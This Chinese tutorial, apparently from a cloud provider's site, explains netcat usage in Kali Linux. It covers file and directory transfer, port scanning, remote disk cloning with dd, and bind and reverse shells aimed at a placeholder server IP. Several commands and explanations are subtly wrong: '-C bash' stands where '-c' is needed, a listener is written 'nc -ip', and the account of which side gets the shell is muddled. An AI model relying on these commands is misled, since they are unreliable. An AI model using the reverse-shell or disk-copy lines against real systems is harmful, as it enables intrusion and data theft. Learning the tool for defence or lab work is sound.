kali 工具NETCAT的使用方法

kali 工具NETCAT的使用方法，針對(duì)這個(gè)問(wèn)題，這篇文章詳細(xì)介紹了相對(duì)應(yīng)的分析和解答，希望可以幫助更多想解決這個(gè)問(wèn)題的小伙伴找到更簡(jiǎn)單易行的方法。

1.NETCAT作為客戶(hù)端常用的命令

nc -v verbose [use twice to be more verbose]

nc -n numeric-only IP addresses, no DNS

下列是nc的所有命令：  

nc -vn 123.125.50.29 110(POP3服務(wù)器的110端口)

nc -nv 202.181.12.12 25(SMTP服務(wù)器的25端口)

2.NC--傳輸文本信息

服務(wù)器：nc -l -p 端口號(hào)

客戶(hù)端：nc -nv 服務(wù)器的ip 端口號(hào)

應(yīng)用：遠(yuǎn)程電子取證

ls -l的取證

ps aux的取證

3.nc文件/目錄傳輸

（1）文件傳輸

往服務(wù)器傳文件：

服務(wù)器：nc -ip 端口號(hào) > 文件名

客戶(hù)端：nc -nv 服務(wù)器ip地址 端口號(hào) < 文件名 -q 1

往客戶(hù)端傳文件：

服務(wù)器：nc -lp 端口號(hào) < 文件名 -q 1

客戶(hù)端：nc -nv 服務(wù)器ip地址 端口號(hào) > 文件名

2）目錄傳輸

也涉及雙向，和上述的文件傳輸類(lèi)似

向客戶(hù)端發(fā)送文件目錄：

服務(wù)器：tar -cvf - 目錄名/ | nc -lp 端口號(hào) -q 1

客戶(hù)端：nc -nv 服務(wù)器ip地址 端口號(hào) | tar -xvf -

（3）加密傳文件

服務(wù)器：nc -lp 端口號(hào) | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 文件名

客戶(hù)端：mcrypt --flush -Fbq -a rijndael-256 -m ecb < 文件名 | nc -nv ip地址 端口號(hào)-q 1

4.nc-流媒體服務(wù)

服務(wù)器：cat 文件名.mp4 | nc -lp 端口號(hào)

客戶(hù)端：nc -nv 服務(wù)器ip地址 端口號(hào) | 播放器（mplayer） -vo x11 -cache 3000 -

5.nc--端口掃描

nc -nvz ip地址 端口范圍 //掃描TCP端口

nc -nvzu ip地址 端口范圍 //掃描UDP端口

每一個(gè)掃描器的掃描結(jié)果都不是特別準(zhǔn)確的，可以多使用幾種方式對(duì)端口進(jìn)行掃描以增加準(zhǔn)確性

6.nc--遠(yuǎn)程克隆硬盤(pán)

服務(wù)器：nc -lp 端口號(hào) | dd of=/dev/sda

客戶(hù)端：dd if=/dev/sda | nc -nv 服務(wù)器ip地址 端口號(hào) -q 1 

遠(yuǎn)程電子取證，可以將目標(biāo)服務(wù)器硬盤(pán)遠(yuǎn)程復(fù)制，或者內(nèi)存

7.nc--遠(yuǎn)程控制

正向：服務(wù)器：nc -lp 端口 -C bash

           客戶(hù)端：nc -nv 服務(wù)器ip地址 端口

這樣可以使服務(wù)器獲得客戶(hù)端的一個(gè)bash

反向：服務(wù)器：nc -lp 端口

           客戶(hù)端：nc 服務(wù)器ip地址 端口 -C bash

這樣可以使客戶(hù)端獲得服務(wù)器的一個(gè)bash

nc缺乏加密和身份驗(yàn)證的能力

關(guān)于kali 工具NETCAT的使用方法問(wèn)題的解答就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，如果你還有很多疑惑沒(méi)有解開(kāi)，可以關(guān)注億速云行業(yè)資訊頻道了解更多相關(guān)知識(shí)。